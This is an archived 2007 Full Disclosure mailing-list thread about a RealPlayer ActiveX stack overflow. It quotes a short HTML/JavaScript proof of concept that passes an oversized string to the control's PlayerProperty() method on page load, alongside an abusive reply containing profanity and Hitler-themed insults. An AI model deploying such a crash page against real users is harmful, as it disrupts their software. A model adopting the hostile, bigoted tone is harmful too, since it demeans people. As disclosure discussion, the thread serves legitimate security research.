Full Disclosure mailing list archives
Re: UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
From: "Joey Mengele" <joey.mengele () hushmail com>
Date: Tue, 27 Nov 2007 11:06:38 -0500
LOLOLOLOL ok you win, client side denial of service warrants your 5 electronic mail messages with up to the minute updates. I bet this one will be exploited in the wild! Get a life LOLOL! J On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad <elazarb () earthlink net> wrote:
"Stack Overflow" - learn to read. A DoS attack still has some security implications... -----Original Message-----From: Joey Mengele <joey.mengele () hushmail com> Sent: Nov 27, 2007 1:05 AM To: full-disclosure () lists grok org uk, elazarb () earthlink net Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayerierpplug.dll ActiveX Control Multiple Stack OverflowsHoly mother of Hitler will you shut the fuck up already. This isa"stack overflow" not a "stack based buffer overflow". There arenosecurity implications here. You are worse than Jewha Mati Laurio.Elazar, please do not post to this list again. Please leave the trolling to the professionals. J P.S. Sorry for the swear words John. On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad <elazarb () earthlink net> wrote:After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originallypostedis really http://www.securityfocus.com/bid/26130, although I am not sure why Linux is listed under the "Vulnerable" section, soIam taking it out of the PoC code. Real claims to have patchedthisback in October, but I can still throw a stack overflowexceptionvia this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows: ------------- <!-- written by e.b. --> <html> <head> <script language="JavaScript" DEFER> function Check() { var s = "AAAA"; while (s.length < 999999) s=s+s; var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5} var obj2 = obj.PlayerProperty(s); } </script> </head> <body onload="JavaScript: return Check();"> </body> </html> ------------- Elazar _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-- Click for your daily horoscope, learn about money, love & family. http://tagline.hushmail.com/fc/Ioyw6h4c4ZBHl2sHpyjNjTLgy4OTny6jhrFrqMryjXVt31vg2H7tNd/
-- Click for your daily horoscope, learn about money, love & family. http://tagline.hushmail.com/fc/Ioyw6h4c4ZARVCeSZnQsflA3BGgTQlm8TvOc2Qh6Kh1tD32a9sgsa8/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows Joey Mengele (Nov 27)
- <Possible follow-ups>
- Re: UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows Joey Mengele (Nov 27)